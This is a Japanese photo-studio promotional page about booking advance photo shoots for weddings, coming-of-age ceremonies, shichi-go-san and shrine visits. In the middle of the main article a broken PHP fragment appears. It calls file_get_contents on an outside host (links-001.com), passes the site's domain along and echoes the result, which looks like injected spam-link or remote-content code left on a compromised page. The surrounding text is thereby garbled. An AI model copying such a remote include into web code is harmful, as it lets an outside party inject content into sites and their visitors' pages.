前へ
次へ

前撮りを申込む時の注意点

結婚式の当日に写真撮影をするということも多いですが、新郎新婦だけで記念になるものを残しておきたいとい

more

お得な撮影ができる前撮り

七五三など決まった時期に撮影をする行事がある場合、フォトスタジオも混み合ってしまうということがありま

more

成人式の前撮りはいつぐらいなのか

写真撮影といえば、成人式を記念して行うという人もいます。
しかし成人式当日の撮影をするともなると時間的

more

記念の写真を遺すために前撮りをしたい

長い人生の中では、高校や大学に入学をしたり、結婚を経験してお子様を授かることが多いです。
人生の節目の時期になると、記念の写真を遺しておきたい人がほとんどです。
お子様のいるご家庭では、お宮参りや七五三、入学式などの行事がありますし、20歳の記念に成人式などがあります。
セレモニーの当日は家族で食事をしたり、儀式を行う必要があるので、忙しい人がほとんどです。
地元で人気の高い写真館では、事前に電話や店頭で予約を入れておくと、写真の前撮りをしてくれます。
成人式の前撮りの場合は、4月から5月、10月から11月ぐらいの気候の良い時期がお勧めです。
降水量の多い梅雨の時期や、蒸し暑い真夏の時期は避けたほうが良いでしょう。
現代は挙式や披露宴を行わず、フォトウエディングをしたい人が増えています。
写真館では洋装の写真はもちろん、伝統的な和装の衣裳を身に付けて撮影が出来ます。
豊富なデザインの衣裳が揃っているので、気に入った商品をレンタルできます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

七五三はお子様を災厄から守り、健やかな成長を祝うための大切な儀式です。
幼児期の可愛い写真を遺しておきたい人がほとんどです。
前撮りを行っている写真館では、女児の被布や男児の羽織袴、洋装のドレスなどの豊富な衣裳が揃っています。
比較的レンタル料がリーズナブルになっており、トレンド感のある流行のデザインの商品が揃っています。
お子様を愛らしくみせてくれる、素敵な衣裳を選ぶことが出来ます。
お宮参りはお子様にとっては、大切な行事です。
赤ちゃんの体は大変デリケートなので、お子様の扱いに慣れているスタッフが担当します。
お子様のご機嫌が悪い時でも、上手にあやしてくれるので安心です。
お子様の体調に配慮をしながら、体に負担の少ない前撮りを心掛けています。
写真館では台紙の商品はもちろん、アルバムタイプの商品も取り扱っています。
高画質で美しい写真を遺すことが出来るので、一生の記念になります。

Page Top